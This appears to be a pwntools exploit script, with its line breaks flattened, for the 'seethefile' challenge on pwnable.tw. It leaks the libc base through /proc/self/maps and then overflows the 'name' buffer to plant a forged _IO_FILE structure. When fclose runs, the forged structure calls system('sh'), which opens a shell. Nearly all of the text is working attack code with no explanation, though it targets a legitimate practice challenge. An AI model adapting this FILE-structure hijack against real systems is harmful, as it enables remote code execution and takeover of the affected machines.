from pwn import * import os import struct import random import time import sys import signal
salt = ''
def clear(signum=None, stack=None): print('Strip all debugging information') os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt)) exit(0)
try: gdb_symbols = ''' '''
f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') f.write(gdb_symbols) f.close() except Exception as e: print(e)
context.arch = "i386" context.log_level = 'debug' execve_file = './seethefile'
sh = process(execve_file) sh = remote('chall.pwnable.tw', 10200)
elf = ELF(execve_file) libc = ELF('./libc-2.23.so')
try: gdbscript = ''' set $f=(struct _IO_FILE_plus **)&fp # b *0x8048AFD b _IO_new_fclose '''
f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') f.write(str(proc.pidof(sh)[0])) f.close()
f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') f.write(gdbscript) f.close() except Exception as e: print(e)
sh.sendlineafter('Your choice :', '1') sh.sendlineafter('What do you want to see :', '/proc/self/maps')
sh.sendlineafter('Your choice :', '2') sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Your choice :', '2') sh.sendlineafter('Your choice :', '3')
sh.recvline()
libc_addr = int(sh.recvuntil('-')[:-1], 16) log.success('libc_addr: ' + hex(libc_addr))
layout = [ 0,0, libc_addr + libc.symbols['system'], 0, 0, 0, 0, 0, elf.symbols['name'] + 0x28, 0, u32('\x80\x80||'), u32('sh\0\0'), ]
sh.sendlineafter('Your choice :', '5')
sh.sendlineafter('Leave your name :', flat(layout).ljust(0x94 + 0x28, '\0') + p32(elf.symbols['name']))
sh.interactive() clear()
|